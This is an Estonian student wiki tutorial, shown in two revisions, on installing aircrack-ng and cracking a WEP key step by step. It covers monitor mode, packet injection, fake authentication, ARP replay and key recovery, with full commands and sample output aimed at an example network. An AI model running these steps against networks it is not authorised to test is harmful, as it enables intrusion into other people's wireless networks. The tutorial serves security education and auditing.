* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89366</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89366"/>
		<updated>2015-05-26T09:23:39Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Üldkirjeldus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
==Üldkirjeldus==&lt;br /&gt;
&lt;br /&gt;
Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset. aircrack-ng, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks&lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
